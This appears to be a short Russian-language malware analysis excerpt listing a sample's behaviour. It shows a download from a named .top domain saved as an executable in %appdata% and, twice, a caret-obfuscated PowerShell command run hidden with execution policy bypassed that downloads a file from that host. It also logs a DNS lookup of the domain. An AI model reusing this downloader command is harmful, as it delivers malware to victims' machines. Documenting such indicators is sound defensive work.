Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWER^sh^ELL^.^Ex^E ^-exEcu^tiOnpO^L^i^Cy^ B^YP^asS^ -N^Op^roF^ILE^ ^-WIN^d^OwS^TYLe HIDd^eN ^(n^Ew^-ObjEct ^S^y^s^t^E^M^.NEt^.W^E^BClIent).DowN^l^oadfi^le(^'http://hometowergop.t...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "PoWER^sh^ELL^.^Ex^E ^-exEcu^tiOnpO^L^i^Cy^ B^YP^asS^ -N^Op^roF^ILE^ ^-WIN^d^OwS^TYLe HIDd^eN ^(n^Ew^-ObjEct ^S^y^s^t^E^M^.NEt^.W^E^BClIent).DowN^l^oadfi^le(^'http://hometowergop.t... (со скрытым окном)